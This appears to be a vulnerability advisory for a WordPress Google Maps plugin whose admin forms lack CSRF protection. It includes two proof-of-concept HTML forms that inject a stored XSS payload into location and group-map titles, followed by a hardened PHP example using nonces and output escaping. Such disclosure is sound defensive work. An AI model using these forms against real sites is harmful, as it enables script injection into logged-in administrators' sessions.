The lack of CSRF protection could allow attackers to perform XSS attacks against logged-in administrators.
<form method="POST" action="https://example.com/wp-admin/admin.php?page=wpgmp_add_location" />
  <input type="text" name="googlemap_title" value='"><img src=x onerror=alert(1) /> ' />
  <input type="submit" />
</form>

<form method="POST" action="https://example.com/wp-admin/admin.php?page=wpgmp_google_wpgmp_create_group_map" />
  <input type="text" name="group_map_title" value='"><img src=x onerror=alert(1) /> ' />
  <input type="submit" />
</form>
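For comparison, a hardened admin form and handler for one of the fields above, as an added example that is not the plugin's own code. It assumes it is loaded inside WordPress admin; the `example_` function names, the nonce action and field names, and the `manage_options` capability are hypothetical, and only `googlemap_title` comes from the proof of concept.

```php
<?php
// Added example, not the plugin's code. The example_ names and the nonce
// action/field are hypothetical; only googlemap_title comes from the PoC.

const EXAMPLE_NONCE_ACTION = 'example_add_location';
const EXAMPLE_NONCE_FIELD  = 'example_location_nonce';

// Render the admin form: embed a per-user, per-action nonce and escape the
// stored title for the HTML attribute context it is echoed into.
function example_render_location_form( $stored_title ) {
    ?>
    <form method="post">
        <?php wp_nonce_field( EXAMPLE_NONCE_ACTION, EXAMPLE_NONCE_FIELD ); ?>
        <input type="text" name="googlemap_title"
               value="<?php echo esc_attr( $stored_title ); ?>" />
        <?php submit_button(); ?>
    </form>
    <?php
}

// Handle the POST: check capability and nonce before reading any input.
// Returns the cleaned title, or null when the request is not a POST.
function example_save_location() {
    if ( 'POST' !== $_SERVER['REQUEST_METHOD'] ) {
        return null;
    }
    if ( ! current_user_can( 'manage_options' ) ) { // assumed capability
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }
    // Stops the request when the nonce is missing or invalid, which is the
    // case for a form submitted from another site.
    check_admin_referer( EXAMPLE_NONCE_ACTION, EXAMPLE_NONCE_FIELD );

    // Strip tags on input as well, so markup is never stored in the title.
    $title = isset( $_POST['googlemap_title'] )
        ? sanitize_text_field( wp_unslash( $_POST['googlemap_title'] ) )
        : '';

    return $title; // caller stores it with $wpdb->insert() or $wpdb->prepare()
}
```

The nonce check addresses the missing CSRF protection; `esc_attr()` on output is what keeps a stored title from breaking out of the `value` attribute even if an unsanitized value is already in the database.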
ethicalhack3r
No
2015-08-20 (about 7 years ago)
2015-11-23 (about 7 years ago)
2020-09-08 (about 2 years ago)